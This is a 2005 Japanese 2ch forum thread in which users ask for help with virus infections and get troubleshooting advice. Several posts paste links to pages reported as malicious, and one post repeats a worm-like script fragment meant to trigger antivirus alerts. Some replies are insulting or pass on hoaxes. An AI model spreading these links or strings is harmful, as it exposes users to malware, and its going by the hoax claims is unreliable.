450名無しさん@お腹いっぱい。:2005/11/17(木) 15:16:02
>>447
http://camluver.com/main.html
ここが詳しいので読んでみたらどうですか
451名無しさん@お腹いっぱい。:2005/11/17(木) 15:17:04















452名無しさん@お腹いっぱい。:2005/11/17(木) 15:19:06
>>447
優しい方だよ〜それは災難だったね。君の恐怖を取り除いてあげよう
リカバリをしたまえそれが一番効果的だよ
453名無しさん@お腹いっぱい。:2005/11/17(木) 15:20:23
>>448
甘いかどうかしゃぶってみよう
454名無しさん@お腹いっぱい。:2005/11/18(金) 17:04:30
( ^3^)≡○#) 3・)∴.;
455名無しさん@お腹いっぱい。:2005/11/18(金) 17:37:14
あンまああぁぁぁぁ〜〜〜〜ぃぃぃいい(*´Д`*)
456名無しさん@お腹いっぱい。:2005/11/18(金) 21:33:45
これ踏んでしまったんですが大丈夫でしょうか?
とりあえず強制終了しました。
ノートン先生が反応して修復できませんでした。とか言われました
http://stillwater.bravehost.com/cast/Lena.html
457名無しさん@お腹いっぱい。:2005/11/18(金) 23:39:08
>ノートン先生が反応して修復できませんでした。
でなにが
>大丈夫でしょうか?

  なんだよアホが!

今すぐセーフモードでスキャンしろ
駄目だったら、リカバリな。
458名無しさん@お腹いっぱい。:2005/11/19(土) 07:26:51
修復できなきゃ削除しろってことだな
459名無しさん@お腹いっぱい。:2005/11/19(土) 08:09:09
最近ずっと思ってたんだけてたんだけど、
セーフモードでスキャンて何?&どうやるの?
460名無しさん@お腹いっぱい。:2005/11/19(土) 08:51:09
おまいは知らんでいい
461名無しさん@お腹いっぱい。:2005/11/19(土) 09:02:47
>>459
>460では可哀想なのでチョット解説しちゃうど。

セーフモードっつーのは、必要最小限の構成で立ち上がるのな。
んだから、悪さをする奴は寝ている可能性が高いんよ
ほんでもって、アンチウィルスとアンチスパイでスキャンすると見っけてから
やっつけられる可能性が高いのな。
んだから、使用中で削除出来ないってことが無くなるっつーわけなんよ

セーフモードの立ち上げ方はOSによって違うんで調べておくれ。
462名無しさん@お腹いっぱい。:2005/11/19(土) 16:36:06
tp://www.albinoblacksheep.com/flash/open.html

↑これってウイルス何でしょうか?
ノートンインターネットセキュリティーは無反応でした。
463名無しさん@お腹いっぱい。:2005/11/19(土) 16:47:06
>>462
ブラクラ ウィルスのカテゴリーじゃない
464名無しさん@お腹いっぱい。:2005/11/19(土) 17:41:46
( ^3^)≡○#) 3・)∴.;
465名無しさん@お腹いっぱい。:2005/11/19(土) 19:47:45
>>463ありがと
466名無しさん@お腹いっぱい。:2005/11/19(土) 20:44:54
http://sportsnavi.bravehost.com/fight/headlines/20051119-00000009-kyodo_sp-spo.html

ここのページを踏んでしまったのですが、どういったものなんでしょうか?
467名無しさん@お腹いっぱい。:2005/11/19(土) 20:57:44
468名無しさん@お腹いっぱい。:2005/11/19(土) 21:02:36
tp://sportsnavi.bravehost.com/fight/headlines/20051119-00000009-kyodo_sp-spo.html

【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 検索中です
とりあえず HTML CRINET.Aというのが見つかりました。
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 現状特にありません。
【何をしたらそんなことになったのか】 上のアドレスをクリック
【これまでにとった措置】 スキャン中
【その他の質問】 対処方法 トロイ関連の場合 何かいいフリーのソフトが
あれば教えてください。
469名無しさん@お腹いっぱい。:2005/11/19(土) 21:21:32
>>468
鑑定人の方?
470名無しさん@お腹いっぱい。:2005/11/19(土) 21:22:25
>>469
踏んだものです
471名無しさん@お腹いっぱい。:2005/11/19(土) 21:34:35
誰かravを使っている人はいませんか?
どっかのテストではnod32よりも速くて検出力が高いんですが
472名無しさん@お腹いっぱい。:2005/11/19(土) 21:56:43
> どっかのテストではnod32よりも速くて検出力が高いんですが
それ信用するのですか?w
473468:2005/11/19(土) 22:37:12
鑑定していただける方お願い致します
474名無しさん@お腹いっぱい。:2005/11/19(土) 22:48:54
>>473
とりあえず鑑定した当人に聞いてみれば・・・
http://etc3.2ch.net/test/read.cgi/entrance/1131357853/
475名無しさん@お腹いっぱい。:2005/11/20(日) 00:11:13
>>471
Windows版なんかあったんだ。なんにせよMSに買収されたから売ってないだろ。
そもそも日本ローカルにはほとんど未対応だろうし。
476名無しさん@お腹いっぱい。:2005/11/20(日) 00:16:10
tp://K1Dynamite.bravehost
【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 検索中です
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 現状特にありません。
【何をしたらそんなことになったのか】 上のアドレスをクリック
【これまでにとった措置】検索中
IEが応答なしになって数秒後、DOS画面が4つぐらい出てWarez?みたいな文字が一瞬出て消えました
もうこれはリカバリーしかないでしょうか?
477_:2005/11/20(日) 01:48:07
【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 検出されず
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 たまに画面が一瞬真っ暗になる。すぐ元に戻る。
【何をしたらそんなことになったのか】 わからない
【これまでにとった措置】なにも

何かのウィルスでしょうか?
478名無しさん@お腹いっぱい。:2005/11/20(日) 02:09:56
>>468
俺もK−1のスレで感染し、ノートンに報告した。
ノートンからの返答があって・・・・

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
(略)   
このファイルは悪質なものではありませんが、あなたのコンピュータ上で知らないうちに動作しています。このファイルを削除することをお勧めします。

との返答がありました。少し安心・・・・
バスターにも報告しておいたほうがいいかも
479468:2005/11/20(日) 02:17:47
>>478
ありがとうございます。
連絡してみようかな。悪質じゃないけど、知らないうちに動作しています?ってのが
若干気になりますね。

このファイルってのはどういったファイルなんですか?
480名無しさん@お腹いっぱい。:2005/11/20(日) 03:05:49
【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 nortonとAVG
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 検出できず
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】ネットに繋ごうとするとブルーアウト
エラーメッセージがでる
【何をしたらそんなことになったのか】 不明
【これまでにとった措置】エラーメッセージに従いチェックディスク その他デバイスも調査するも
異常なし
【その他の質問】セーフモードではネットに繋げます。今もセーフモードで書き込み
481名無しさん@お腹いっぱい。:2005/11/20(日) 06:29:24
アップルの「iTunes」に深刻な脆弱性--マシン乗っ取りのおそれ
http://www.japan.cnet.com/news/sec/story/0,2000050480,20091217,00.htm

 Appleの音楽管理ソフト「iTunes」の一部のバージョンに深刻な脆弱性が見つかった。
この脆弱性を悪用されると、攻撃者にリモートからコンピュータを乗っ取られる可能性があると、
あるセキュリティ調査会社注意を呼びかけている。
482名無しさん@お腹いっぱい。:2005/11/20(日) 11:06:47
>>1が調子にのってウィルス貼りつけて、被害者が続出。
もはや「ごめんなさい」じゃ済まされなくなりました。
被害総額も数千万〜億までのぼりそうです。
>>1が逮捕されるのを応援しましょう。

↓のスレの>>1のURLは絶対に踏むなよ?ウィルスだから。
ノートン先生も通用しないウィルスです。
もし踏んでしまったらBitDefenderで駆除してね。PCぶっこわれますから
http://life7.2ch.net/test/read.cgi/diet/1131084978/
483名無しさん@お腹いっぱい。:2005/11/20(日) 11:08:57
>>482
平気で踏んだぞお WindowsUpdateしているから全然関係ない
そんなのもうウィルスじゃない
484名無しさん@お腹いっぱい。:2005/11/20(日) 12:08:42
>>482
最近多いんだよなぁ、「?」の使い方すら分からんやつ。
日本語の乱れとか、そんなレベルじゃない。情けなさ杉。
485名無しさん@お腹いっぱい。:2005/11/20(日) 12:38:04
同感だが2chで言う台詞じゃないな?
486名無しさん@お腹いっぱい。:2005/11/20(日) 12:49:33
( ^3^)≡○#) 3・)∴.;
487名無しさん@お腹いっぱい。:2005/11/20(日) 12:52:17
>>485
馬鹿には通用しないぞ
488名無しさん@お腹いっぱい。:2005/11/20(日) 12:57:10
( ^3^)≡○#) 3・)∴.;
489(ノ・_-)ノ━☆:2005/11/20(日) 14:10:18
他のウィルスを削除する機能を持ったウィルスが標準装備されてます。
490名無しさん@お腹いっぱい。:2005/11/20(日) 17:05:54
>>255とほぼ同じ症状なんですが、
よく出てくるデリバリというのはどうやれば良いのでしょうか?
ぐぐっても分からなかったので、教えてください。

あと、フォーマットして再インストすればウィルスって大体消えますか?
色々面倒なら、フォーマットしちゃおうかと思っているのですが・・・。
491名無しさん@お腹いっぱい。:2005/11/20(日) 17:09:10
カリクビー ってのも有るんだが・・・
492名無しさん@お腹いっぱい。:2005/11/20(日) 17:11:37
>>490
ググるなら「リカバリ」でググること。
493デリバリー:2005/11/20(日) 18:40:51
( ^3^)≡○#) 3・)∴.;
494名無しさん@お腹いっぱい。:2005/11/20(日) 20:58:32
VIPから対処方法聞きにきますた

ちょwwwヤバスwwwwwww
http://ex14.2ch.net/test/read.cgi/news4vip/1132484340/l50


84 名前: 以下、名無しにかわりましてVIPがお送りします 投稿日: 2005/11/20(日) 20:19:14 ID:WxZ6h84Y0
ウィルス名はhappy MAD-0922
まだ世間に広まってないワーム+トロイみたいな物で、かなりの悪影響がある。

アメリカ(Gyao)ではこのウィルスも対策に取り組んでいる


124 名前: 以下、名無しにかわりましてVIPがお送りします 投稿日: 2005/11/20(日) 20:27:34 ID:WxZ6h84Y0
あっ、MAD-0922について調べたらこれは発祥がアブガニスタンで、Gyaoの攻撃用に作られたウィルスだそうだ。
政府のPCでも麻痺させてなんかするのかな?

とにかく通報した


このウィルスの対処方法とかないのでしょうか?
495名無しさん@お腹いっぱい。:2005/11/21(月) 21:30:28
>>1
http://www.lakoff.com/login/yahoo/
http://virus.org.ua/unix/woid.jpg
http://yaplog.bravehost.com/kouki_aya_love2/

 |  お  や  す  み  ぃ  ぃ  ー  !     |
 \_  _____ _______  _____ _/
    ∨      ∨       ∨      ∨
  ∧ ∧      ∧ ∧     ∧ ∧     ∧ ∧
\(*´∀`)  \ ( ・3・)   \(*・∀・)  \( ゚Д゚)
 (__)    (__)    (___)    (__)
496名無しさん@お腹いっぱい。:2005/11/22(火) 17:35:21
>495踏むなよ
ソースチェッカーオンラインを使いましょう。
http://so.7walker.net/guide.php?
>ソースチェッカーオンラインは、ブラクラのチェックソフトとして開発してきた
>ソースチェッカー(開発終了)というソフトのオンライン版になります。
>主な機能として、ブラクラチェックの他に、画像判別、文字コードの変換(EUC)、
>Content-Type判別、サイトのプレビュー表示(ドメイン名の場合のみ)などがあります。
497名無しさん@お腹いっぱい。:2005/11/22(火) 18:26:24
最近パソコンを起動しても、画面がつきません。
これはウイルスの仕業ですか?
XPです
498名無しさん@お腹いっぱい。:2005/11/22(火) 20:20:45
>>497
バカのせいです
499名無しさん@お腹いっぱい。:2005/11/22(火) 20:55:02
>>497
完全にウイルスのせい
500名無しさん@お腹いっぱい。:2005/11/22(火) 21:01:43
他スレでNOD基地外の荒し宣言を見つけた。

>NOD32アンチウィルス Part24
>457 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/11/20(日) 16:47:32
>ノートンは糞、何度でも言ってやるよww
>そこらじゅうで言ってやるぜww

あちこちのスレにも荒しぶりが書いてた。

>セキュリティ板などにインチキな比較画像をコピペしたのもNOD厨だった。
>http://tmp5.2ch.net/test/read.cgi/tubo/1120964614/321-329

>他の製品も相当な被害に遭っているし・・・・。
>http://pc8.2ch.net/test/read.cgi/sec/1132160664/6-10
501名無しさん@お腹いっぱい。:2005/11/23(水) 02:44:55
【使用OS】 XP proSP2
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】 ノートン2005
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 発見できず
【別のオンラインスキャンしたならその結果は】 ↑同様
【症状を具体的に、分かる限りすべて書く】

結構前からなのですが、ネットワーク接続をした状態でWindowsを起動すると
毎回下記のようなメッセージが表示されます。

Norton Internet Worm Protectionが侵入の試みを検出して遮断しました。
セキュリティルール:Default Block Bla Trojan horse
パス:N/A
ファイル名:N/A
方向:インバウンド
ローカルアドレス:
ローカルポート:1042
リモートアドレス:
リモートポート:1042
プロトコル:UDP

不正アクセスを防いでるというのは分かるんですが、毎回起動する度に出るので怖く感じます。
ウイルススキャンしても何も検出されないし、スパイウェアスキャン等しても変化なし。
このメッセージが出ないようにするにはどうすればいいのでしょか?

502名無しさん@お腹いっぱい。:2005/11/23(水) 05:18:54
>>501
ノートンでまだ定義されていないトロイかスパイウェアに侵入されてる可能性あり
503名無しさん@お腹いっぱい。:2005/11/23(水) 07:54:04
スパイウエアの検出なら、これを参考に汁。

>スパイウェアに対する検出力評価
>ttp://www.infoworld.com/article/05/09/19/38FEspy_1.html
>1位 F-Secure
>2位 Webroot
>3位 LANDesk
>4位 Sunbelt
>5位 SurfControl
>6位 McAfee
>7位 Trend Micro
>8位 eTrust
>9位 NOD32 v2.5
504名無しさん@お腹いっぱい。:2005/11/23(水) 07:58:05
追記

>【別のオンラインスキャンしたならその結果は】 ↑同様

ノートン以外のAVメーカーのスキャンでも検出されないなら、トロイの可能性は低い。
スパイウエアの可能性があり。
505名無しさん@お腹いっぱい。:2005/11/23(水) 12:58:45
相談にのってくれ!最近、しばらくネットを繋げて寝る前にシャットダウンすると、「他のユーザーが接続しています。」みたいなこと言ってくるんだよ!ADSLモデムで繋いでるだけだし、LAN繋いでないし、どういうこと!?
506名無しさん@お腹いっぱい。:2005/11/23(水) 13:01:42
>>505
だから他のユーザーがつないでる
507おねがいします:2005/11/23(水) 13:01:55
ある無料スキャンをしてみたら以下のものがでたんです。
jword
cmin

でもこのソフトはいれてないんですよね。どうしてでしょう?
また駆除する方法をおしえてください。
508名無しさん@お腹いっぱい。:2005/11/23(水) 13:02:45
>>507
入れてないんじゃなくて入ってる
普通にアンインスコしる
509おねがいします:2005/11/23(水) 13:06:07
>>508
ありがとうございまし。
普通にPCに元から入ってる機能ということでしょうか?
510名無しさん@お腹いっぱい。:2005/11/23(水) 13:09:18
>>509
さあ?
何かのソフトに付随してついてきたりしてるから進入経路はわかりません
別にウイルスではないが気になるなら早めに消しとけ
511おねがいします:2005/11/23(水) 13:13:11
>>510
ウイルスではないんですね。だから他のスキャンにはかからなかったのかあ
ありがとうございます。助かりました。
512名無しさん@お腹いっぱい。:2005/11/23(水) 13:45:30
( ^3^)≡○#) 3・)∴.;
513名無しさん@お腹いっぱい。:2005/11/23(水) 13:58:20
【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】 
ウイルス名 TSPY_VB.AP
発見場所C:\WINDOWS\SYSTEM32\IMEPADSV.EXE

【症状を具体的に、分かる限りすべて書く】
今のところ特にこれといった症状はありません
【何をしたらそんなことになったのか】
多分どこかのホームページでファイルをダウンロードしたとき
だろうと思うんですけどその時はウイルスバスターは反応
しなかったので・・・ちなみに自分ファイル共有ソフトは使ってません。

【これまでにとった措置】
ウイルスバスターでファイルを隔離できなかったので
手動で消そうとしましたがSYSTEM32フォルダの中にIMEPADSV.EXE
を見つけることができませんでした。
【その他の質問】
消してもよいファイルなら、このファイルの消し方をぜひ教えてください。
よろしくお願いします。
514名無しさん@お腹いっぱい。:2005/11/23(水) 14:02:21
>>513
最新版にアップデートしてもう一回検索しろ
515513:2005/11/23(水) 14:08:13
「すでに最新版にアップデートされています。
アップデートの必要はありません」と言われてしまいます・・・
516MONA ◆ApRjtwCQJQ :2005/11/23(水) 14:33:03
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>513
 | | |  \_____
 (__)___)

最新の亜種みたい。サポセンに聞いた方がよさそう。
517513:2005/11/23(水) 19:59:59
IMEPADSV.EXE ですがフォルダオプションの
「保護されたオペレーティングシステムファイルを表示
しない」のチェックを外すとみつけることができました。
その後セーフモードで削除に成功しました。

ご迷惑をおかけしました。
518名無しさん@お腹いっぱい。:2005/11/24(木) 02:00:38
>>513
その注意力じゃ他にも感染してそうだから、とりあえずnyをアンインスコした方がいいんジャマイカ?
519名無しさん@お腹いっぱい。:2005/11/25(金) 08:06:02
      .exe入りzipアーカイブを解凍後、
PCが勝手に再起動したのですが
これはウイルスの作用でありえるのでしょうか?
それともzip解凍時でのバグを突いたものや何かで
メモリ不足やバッファなんとかフローとかが起こったのでしょうか?
520名無しさん@お腹いっぱい。:2005/11/25(金) 11:12:57
>>519
おまえが最新の解凍ソフトを使うようなセキュリティを気にするやつじゃないのなら、
何が起こっても不思議じゃない。
521名無しさん@お腹いっぱい。:2005/11/25(金) 11:29:50
>>520
一応アーカイバは「変な場所にファイルが解凍されるバグ(?)」を修正した
Noah3.195と7-zip32.dll4.23です
522名無しさん@お腹いっぱい。:2005/11/25(金) 12:32:36
ごちゃごちゃ言ってないでスキャンしろ
523名無しさん@お腹いっぱい。:2005/11/25(金) 12:36:11
えっ?
524名無しさん@お腹いっぱい。:2005/11/25(金) 12:37:53
スキャンしろ=ウイルスの仕業

wwwwww
525名無しさん@お腹いっぱい。:2005/11/25(金) 20:19:10
質問お願いします
tp://sportsnavi.bravehost.com/fight/K1/20051125-00000008-kyodo_sp-spo.html

ここを踏んで、マカフィーがトロイを削除してくれたのですが、
ウイルスの名前が「何とかwinボム」みたいな感じで、枠内が黒いウインドウが無数に出てきたり、
マイクロソフトテレネット(?)に接続します、というメッセージなどが出てきました。

もしマカフィーが入ってなかったら、いったいどんな事態に陥っていたのですか?
526名無しさん@お腹いっぱい。:2005/11/25(金) 20:20:27
>>525
どうにもならぬ バカにされているだけ
527名無しさん@お腹いっぱい。:2005/11/25(金) 22:03:22
【使用OS】 XP SP1
【WindowsUpdateしてるか】 していません
【AntiVirusは何を使っているか】 ノートンアンチウィルス2003
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】
スキャンしたウィルス名:Trojan Horse
kongbu[1].htm
場所:Temporary Internet Files\Content.IE5\PJQAWHUH
【症状を具体的に、分かる限りすべて書く】
自覚症状は特にありません
週初にスキャンした時は発見されませんでした
【何をしたらそんなことになったのか】
ここ数日はファイルのDLはしていません
画像の閲覧もしくはサイトの閲覧くらいしか考えられないのですが・・・
【これまでにとった措置】
ノートンでは削除できませんでした
直接駆除しようと思ったのですがTemporary Internet Filesの中に
Content.IE5\PJQAWHUHを見つけられませんでした
【その他の質問】
検索してみましたが削除方法が見つけられませんでした
対処方法などわかる方いらっしゃいましたら教えていただきたいです
528名無しさん@お腹いっぱい。:2005/11/25(金) 22:06:09
>【WindowsUpdateしてるか】 していません
>【AntiVirusは何を使っているか】 ノートンアンチウィルス2003

   お帰り下さい。
529名無しさん@お腹いっぱい。:2005/11/25(金) 22:06:21
>>527
コンパネ→フォルダオプションの
表示のすべてのファイルとフォルダを表示するにチェックを入れる
530名無しさん@お腹いっぱい。:2005/11/25(金) 22:13:47
>>527
>【使用OS】 XP SP1

これも追加 九割方釣り
531名無しさん@お腹いっぱい。:2005/11/25(金) 22:16:27
>>529
チェックは入っています
検索でファイルを直接探してみましたが
それでも発見されませんでした
>>528>>530
最新の物にアップデートしていなかったのは
確かに怠慢でしたが釣りではありません
よろしくお願いします
532名無しさん@お腹いっぱい。:2005/11/25(金) 22:20:32
>>531
Temporary Internet Filesをスキャンすることは出来る?
533名無しさん@お腹いっぱい。:2005/11/25(金) 22:22:03
一時ファイルなので、消したりしてないよね…
534名無しさん@お腹いっぱい。:2005/11/25(金) 22:34:27
メールに添付が無かったら、ウィルスに感染することは無いですか?
535名無しさん@お腹いっぱい。:2005/11/25(金) 22:36:52
いいえ
536名無しさん@お腹いっぱい。:2005/11/25(金) 22:43:21
>>534
そんなこと心配してないでちゃんとWindowsUpdateしやがれ タコ
537名無しさん@お腹いっぱい。:2005/11/25(金) 22:51:07
>>534
Win98の俺ですらWindowsうpだては欠かさないぞ!
538527:2005/11/25(金) 22:53:27
>>532
再度PC全体にスキャンをかけてみています(こちらはまだスキャン中です)
Temporary Internet Filesだけもスキャンしてみましたが何も出ませんでした
>>533
数日前にファイルを削除しましたが
感染がわかったのは本日ですので消してはいないはずです

一回目のスキャンが終わった後にノートンの「検疫」の処理はしました
(検疫をするとウィルスが隔離されてスキャンでは引っかからなくなるのでしょうか?)
ただし「修復」はできなかったので駆除されていないと思ったのですが・・・
検疫というのはウィルスの削除の処理とは違うと認識していました
Temporary Internet Filesを開くとContent.IE5があるはずなんですよね?
それ自体を見つけられないということは私が何か間違えていますか?
539名無しさん@お腹いっぱい。:2005/11/25(金) 23:13:27
検疫をするとウィルスが隔離されたんです。
540527:2005/11/25(金) 23:42:38
いろいろと勘違いしていたようです
申し訳ありませんでした
検疫についてもヘルプや検索してみて納得しました
隔離されたファイルを削除してみます
どうもありがとうございました
541名無しさん@お腹いっぱい。:2005/11/26(土) 00:02:22
>>527
基本的な用語くらいは覚えておこうよ。

Temporary Files=一時ファイル

つまり、それを消せば全部無くなるのよ。
542名無しさん@お腹いっぱい。:2005/11/27(日) 12:12:50
( ^3^)≡○#) 3・)∴.;
543名無しさん@お腹いっぱい。:2005/11/27(日) 18:32:46
すいません、
こちらのページを踏んでしまいました。
鑑定スレにて激有害と判断され、対処法をお伺いしたく参りました。

ttp://daylinews.bravehost.com/Society/051106-00000107-kyodo-ent.html

どのような対処をしたらいいでしょうか?
スレ違いでしたらもうしわけございませんでした。
544名無しさん@お腹いっぱい。:2005/11/27(日) 19:10:07
>>543
せっかくまったりしてんのにウィルス運んでくんな馬鹿
545名無しさん@お腹いっぱい。:2005/11/27(日) 19:32:45
>>543
今すぐnetから切り離して、
ウィルスとスパイウェアのスキャンをしろ。
546名無しさん@お腹いっぱい。:2005/11/27(日) 20:47:32
助けてください。
【使用OS】
WinXP
【WindowsUpdateしてるか】
していましたがウイルスで不可能に。
【AntiVirusは何を使っているか】
ノートン先生2004です
【ちゃんとUpdateしてるか】
しています。
【スキャンした結果(ウイルス名・発見場所)】
ウイルスはTrojのようです。
【別のオンラインスキャンしたならその結果は】
していません。感染を恐れて基本は接続なしです。
【症状を具体的に、分かる限りすべて書く】
ノートン先生のインストールアンインストールが不可能になりました。
そしてファイヤーウォールなどネットセキュリティ関連強制OFFです。
【何をしたらそんなことになったのか】
ファイルのDLと思われます。EXEファイルの起動等。
【これまでにとった措置】
ノートンでウイルスを見つけましたが削除が出来ませんでした。
加えて一度アンインストールしようとしたところもう起動できなくなりました、
【その他の質問】
547名無しさん@お腹いっぱい。:2005/11/27(日) 21:03:51
>>543
糞VIPPERは死ねよww
548MONA ◆ApRjtwCQJQ :2005/11/27(日) 21:07:03
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>546
 | | |  \_____
 (__)___)

リカバリかけて、体制立て直したほうがいいんじゃない。


549546:2005/11/27(日) 23:29:26
>>546追記です。
削除ツールSymNRT.exeでノートン先生を消したのですが
再インストール手順に必要なLRSetup.exe が起動せず。
ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953?Open&src=&docid=20040518180840958&nsf=SUPPORT%5CINTER%5Cnavjapanesekb.nsf&view=45d24f3809a3963288256db3005f48d1&dtype=&prod=&ver=&osv=&osv_lvl=

通常の方法で再インストールしても
「デスクがいっぱいです。ディスクファイルのクローズエラー」
で上手くいきません。

レジストリなどいじくってウイルスの猛威を無効化できるでしょうか?
もうノートン先生をあきらめてウイルスバスターを購入すべきでしょうか?

>548
レスありがとうございます。
550名無しさん@お腹いっぱい。:2005/11/28(月) 02:31:04
助けてください

【使用OS】 
W2Kpro SP4 
【WindowsUpdateしてるか】 
しています 
【AntiVirusは何を使っているか】 
avast 
【ちゃんとUpdateしてるか】 
しています 
【スキャンした結果(ウイルス名・発見場所)】 
発見されませんでした 
【症状を具体的に、分かる限りすべて書く】 
『シャットダウンはNTAUTHORITY¥SYSTEMによって開始されました』
のメッセージと60秒のカウントダウンが始まります
サッサーと同じ症状の様なのですが
システムプロセスのメッセージがサッサーとは違い
『C\WINNT\system32\services.exeは状態コード128で突然終了しました』
となっています
【これまでにとった措置】 
avastやオンラインで何度かスキャンしましたが何も見つかりません
検索してみてもサッサーの情報しかヒットしませんでした 

ウィルスによるものかどうかも解らないのですが
サッサーの症状に似ている様なのでここに書き込みました
宜しくお願い致します
  
551名無しさん@お腹いっぱい。:2005/11/28(月) 02:41:16
>>550
それウィルスの可能性は少ない。
単なるシステム障害っぽい。

まず原因は、services.exeの異常終了により自動シャットダウンの繰り返し。
通常に起動してもムダ、普通にセーフモードもダメ。

対処としては、セーフモードのコマンドプロンプトでの起動。
起動するとコマンドプロンプトになるから、そこでexplorer.exeと入力してEnter。
これでエクスプローラが起動するのでタスクバーが使えるようになる。

後は、原因探しなんだけど・・・・
1)直近でインストールしたソフトがあればアンインストールしてみる(アプリケーションの追加と削除)
2)直近で充てた自動パッチを消去してみる。
3)イベントビューアをよく調べて、何が原因かを調査する。

こんなところ
552名無しさん@お腹いっぱい。:2005/11/28(月) 04:12:42
2chの鯖からMSIE JavaScript OnLoad Rte CodeExec
というのを受け取ってしまうんですがこれは無害ですよね?
ウィルスとは違うのですがトロイ系?の質問スレなどが見当たらなかったので。。。

これは一体なんなんでしょうか?
ググッてもいまいち情報が出ないんですがこれが出てスレの取得ができないところがあります・・・。
対策などはあるんでしょうか?
553名無しさん@お腹いっぱい。:2005/11/28(月) 05:00:28
>>552
kak.hta';ken=wd+'START
http://life7.2ch.net/test/read.cgi/diet/1133099812/










                                      (`・ω・´)y−〜
                              ~~~~~~~~~~~~~~~~~~~~~~~~~~
554名無しさん@お腹いっぱい。:2005/11/28(月) 12:12:01
>>552
うちも今朝から。

もしかしてこれ踏まなかった?
//thumbstower.com/?pics/animals/pages/2161.jpg

関係あるかどうか分からんけど。
555名無しさん@お腹いっぱい。:2005/11/28(月) 13:25:08
>>552
<ここ数日2chを騒がせている侵入検知トラップの対策法>

症状:
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。

対策:上に行くほどおすすめ
@Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ(漏れそれやったヴァカです)

AReplace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない

Bよくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。

ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
 今回のはNAVではなくNIS管轄のトラップです
556名無しさん@お腹いっぱい。:2005/11/28(月) 19:54:49
【使用OS】 Windows XP Home Edition
【WindowsUpdateしてるか】 自動更新しています。手動で確認しましたが最新でした。
【AntiVirusは何を使っているか】 ウィルスバスター2005
【ちゃんとUpdateしてるか】 しています。
【スキャンした結果(ウイルス名・発見場所)】 TROJ_KAPOD.P とでています。
【別のオンラインスキャンしたならその結果は】 マイクロソフトのスキャンでは以上なしと
【症状を具体的に、分かる限りすべて書く】 一定時間ごとに、この口座に金振り込めばなおります。
との画面いっぱいの表示がでます。(タスクマネージャーから消せる)
【何をしたらそんなことになったのか】 おそらく、エロ系のHPわたりあるいてるときだと、
3日前ほどに金払ってくださいという画面が出たきがします。(無視しました)
【これまでにとった措置】 ウイルスバスターで検索するも処理不可能で
ファイルを発見しましたがゴミ箱に捨てる、削除不能です。
【その他の質問」ウイルス名でググってみたら英語のHPのみでよく対処がわかりませんでした。
おねがいします。
557名無しさん@お腹いっぱい。:2005/11/28(月) 20:03:04
>>556
スパイウェアだろうな。
以下のページをじっくり読むといいよ。
http://www.higaitaisaku.com/menu5.html
558556:2005/11/28(月) 20:07:17
> ファイルを発見しましたがゴミ箱に捨てる、削除不能です。
プロセスとめるか、セーフモードだと削除できるよ。
559557:2005/11/28(月) 20:08:12
すみません。>>558の名前は557の間違いですorz
560556:2005/11/28(月) 22:33:15
>>557
ウイルスと思われるファイルをセーフモードにて削除後
指定されたHPにていろいろ対策を取りました。

ウイルス検索にて問題無しとなりました。
ありがとうございました。
561名無しさん@お腹いっぱい。:2005/11/28(月) 22:51:48
【使用OS】
   XP sp2
【WindowsUpdateしてるか】
   してます
【AntiVirusは何を使っているか】
   ノートンアンチウイルス2006
【ちゃんとUpdateしてるか】
   してます
【スキャンした結果(ウイルス名・発見場所)】
   無反応
【別のオンラインスキャンしたならその結果は】
   無反応
【症状を具体的に、分かる限りすべて書く】
   メールが大量に送信されます。あて先はバラバラ。
   ただし、ノートン先生によって(?)ブロックされてます。
【何をしたらそんなことになったのか】
   わかりません。ただきっかけはWindows起動時に
   「システムは深刻なエラーから復帰しました」と表示されたときから。   
【これまでにとった措置】
   W32.〜てやつかと思い駆除ツール使いましたが発見されませんでした。

アップデートしても引っかからないんですが、まだ定義されてないウイルスでしょうか?
困ってます。よろしくお願いします。

562たかやん:2005/11/29(火) 14:36:01
